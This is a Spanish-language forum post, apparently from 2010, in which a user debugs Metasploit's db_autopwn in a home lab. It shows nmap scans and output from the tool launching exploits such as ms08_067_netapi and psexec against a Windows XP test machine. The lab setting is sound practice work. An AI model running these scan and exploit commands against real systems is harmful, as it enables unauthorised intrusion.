Si estoy conectado a una red privada lo daba por sabido lo siento, también me conecto con wifi(wlan0) aqui tienes mi nmap:
dazoverride@xxx:~$ sudo nmap -sP 192.168.2.0/24
[sudo] password for dazoverride:
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:09 CEST
Nmap scan report for 192.168.2.1 --> router
Host is up (0.0021s latency).
Nmap scan report for 192.168.2.2 --> pc de sobremesa ubuntu
Host is up (0.0042s latency).
Nmap scan report for 192.168.2.4 -->pc_atacante(ubuntu)
Host is up.
Nmap scan report for 192.168.2.5 --> pc_victima(windows_xp con vulnerabilidad windows/smb/ms08_067_netapi
Host is up (0.00057s latency).
como e dicho antes ahora lo que haria es abrir el msfconsole y:
msf > db_create prueba
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: prueba
msf > db_connect prueba
[*] Successfully connected to the database
[*] File: prueba
msf > db_nmap -n -sT -PN 192.168.2.5
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:21 CEST
Nmap scan report for 192.168.2.5
Host is up (0.010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds
msf > db_autopwn -t -p -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*]
[*] ===============================================================
[*] Matching Exploit Modules
[*] ===============================================================
[*] 192.168.2.5:139 exploit/windows/smb/ms08_067_netapi (port match)
(he quitado los demás para ahorrar espacio)
===============================================================
[*]
[*]
[*] (1/43 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.5:135...
[*] (2/43 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.2.5:139...
.........
[*] (18/43 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.2.5:139...
.........
[*] (42/43 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Waiting on 15 launched modules to finish execution...
[*] (43/43 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
de todas formas lo que mas me sorprende es que me entre al pc victima cuando lo exploto manualmente con el exploit windows/smb/ms08_067_netapi y luego cuando utilizo el db_autopwn vea pasar el exploit como si estuviera intentando explotar el servicio y las sessions siguen a 0. Ademas tambien he probado lo de importar el scan del nessus correctamente incluso veia las vulnerabilidades con el comando db_vulns del metasploit y ejecute la opcion -x del db_autopwn y nada....
Por cierto lo del fast-track enseguida lo pruebo y os informo.